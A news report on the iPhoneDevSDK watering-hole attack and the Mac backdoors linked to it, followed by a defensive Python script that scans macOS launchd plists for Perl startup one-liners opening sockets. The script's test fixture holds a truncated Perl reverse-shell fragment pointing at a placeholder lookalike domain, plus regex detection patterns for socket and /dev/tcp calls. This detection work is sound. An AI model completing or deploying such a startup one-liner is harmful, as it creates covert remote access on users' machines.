Many companies likely affected by iOS developer forum compromise
It is very likely that iPhoneDevSDK was the common gateway for the attacks against Twitter, Facebook and Apple, Sean Sullivan, a researcher at security firm F-Secure, said Wednesday via email.
Sullivan believes that while it's possible the attackers did their homework and researched in advance who visited the forum, it's also possible that they never expected to hack into Twitter, Facebook and Apple systems in particular. "In fact, that might have been their undoing -- they caught too many big fish with strong security teams," he said.
Twitter did not immediately respond to an inquiry sent Wednesday seeking confirmation that the attack against the company involved a previously unknown Java exploit hosted on iPhoneDevSDK.
The exact timeline of the attack against the Web forum is not clear, but it seems that the hackers removed the exploit on Jan. 30, Sefferman said.
Earlier this week, Sullivan said in a blog post that F-Secure obtained some samples of Mac malware uploaded to VirusTotal on Jan. 31, one day before Twitter's hack announcement, that might have been used in the attacks.
One of the samples was a backdoored SSH daemon binary that was very likely dropped by an exploit. The others were one-line Perl scripts that run at startup and open a reverse shell to a remote server, he said.
The URLs contacted by these scripts included a domain that misspelled "Apple Corp"; a domain that sounded like the name of a digital consulting company; and a domain that pretends to be a cloud storage service.
Given the audience of iPhoneDevSDK -- iOS developers -- the attack most likely targeted Mac OS users, Sullivan said Wednesday. However, some old samples of Windows malware that contact one of the same domains as the new Mac backdoors have also been identified. So the same attackers also targeted Windows users in the past, he said.
This type of attack, which involves infecting a website frequently visited by a targeted group of people -- for instance, employees of companies in a certain industry, or political and human rights activists supporting a certain cause -- is referred to in the security community as a "watering hole" attack, because the method resembles the hunting habits of predatory animals that wait near pools of water for prey to come and drink.
Sefferman described iPhoneDevSDK as "the most widely read dedicated iOS developer forum." The site does not publicly list the exact number of registered users, but it has sub-forums dedicated to certain topics that have tens or hundreds of thousands of replies.
Sullivan believes that, given the popularity of iPhoneDevSDK, many other companies were probably affected by this attack as well, but have yet to come forward or even discover the malware on their employees' systems.
Companies that develop iOS apps should probably ask their employees whether they visited iPhoneDevSDK in recent months and should analyze their work computers for malware.
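The persistence mechanism described above (a one-line Perl script that runs at startup and opens a connection to a remote host) is a concrete thing a security team can hunt for on Mac endpoints. The following is an added example for that check; it is not code from the article or from F-Secure. It parses macOS launchd property lists (the usual home of "run at startup" items under LaunchAgents/LaunchDaemons), flags ProgramArguments that invoke a script interpreter with inline code containing socket/connect calls, and extracts any hostnames the inline code would contact so they can be compared against the lookalike domains the article mentions. The two plists embedded below are constructed for the example; the hostname in the suspicious one is a made-up placeholder, not a real indicator.

```python
"""Hunt launchd persistence items for interpreter one-liners that open network
sockets, the pattern described for the Perl startup backdoors (added example;
sample plist content is constructed, not real malware)."""
import plistlib
import re
from typing import Dict, List

# Interpreters commonly abused for one-line startup backdoors.
INTERPRETERS = re.compile(r"(^|/)(perl|python\d?|ruby|bash|sh)$")
# Flags that pass code on the command line instead of from a file.
INLINE_FLAGS = {"-e", "-c"}
# Tokens that indicate inline code opening a network connection.
NET_TOKENS = re.compile(r"\b(Socket|socket|connect|inet_aton|sockaddr_in)\b|/dev/tcp")
# Tokens that indicate the code hands control to a shell or new process.
EXEC_TOKENS = re.compile(r"\b(exec|system|open3|dup2)\b")
# Hostnames passed to Perl's inet_aton("...") in the inline code.
HOST_IN_INET_ATON = re.compile(r'inet_aton\(\s*"([^"]+)"\s*\)')


def extract_hosts(inline_code: str) -> List[str]:
    """Return hostnames/IPs the inline code resolves via inet_aton()."""
    return HOST_IN_INET_ATON.findall(inline_code)


def score_program_arguments(args: List[str]) -> Dict[str, object]:
    """Score one launchd ProgramArguments array.

    Suspicious when a script interpreter is started with inline code (-e/-c)
    that contains socket/connect tokens; exec/system tokens add weight."""
    if not args:
        return {"suspicious": False, "reasons": [], "hosts": []}
    reasons: List[str] = []
    interp = INTERPRETERS.search(args[0]) is not None
    if interp:
        reasons.append(f"interpreter {args[0]}")
    body = " ".join(args[1:])
    inline = interp and any(flag in args[1:] for flag in INLINE_FLAGS)
    if inline:
        reasons.append("inline code via -e/-c")
    if NET_TOKENS.search(body):
        reasons.append("socket/connect call in command line")
    if EXEC_TOKENS.search(body):
        reasons.append("spawns a shell or process")
    suspicious = interp and inline and "socket/connect call in command line" in reasons
    return {"suspicious": suspicious, "reasons": reasons, "hosts": extract_hosts(body)}


def scan_plist_bytes(data: bytes) -> Dict[str, object]:
    """Parse a launchd plist (XML or binary) and score its ProgramArguments."""
    plist = plistlib.loads(data)
    result = score_program_arguments(list(plist.get("ProgramArguments", [])))
    result["label"] = plist.get("Label", "<no label>")
    result["run_at_load"] = bool(plist.get("RunAtLoad", False))
    return result


# Constructed sample: a benign developer helper started at login.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.devsync</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/python3</string><string>/Users/dev/sync.py</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample: a Perl one-liner that opens a socket to a lookalike
# domain at login. The hostname is a placeholder, not a real indicator, and
# the one-liner is deliberately incomplete.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.updatecheck</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/perl</string>
    <string>-e</string>
    <string>use Socket;socket(S,PF_INET,SOCK_STREAM,0);connect(S,sockaddr_in(443,inet_aton("updates.aple-corp.example")));# rest omitted</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


if __name__ == "__main__":
    for sample in (BENIGN_PLIST, SUSPECT_PLIST):
        r = scan_plist_bytes(sample)
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['label']} run_at_load={r['run_at_load']} "
              f"hosts={r['hosts']} reasons={r['reasons']}")
```

In a real sweep you would feed `scan_plist_bytes` every file under `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`, and apply the same `score_program_arguments` logic to crontab entries and login items, which are other places a startup one-liner can hide. Any hostname the scan extracts should be checked against the misspelled-vendor and fake-service domains described above before being treated as benign.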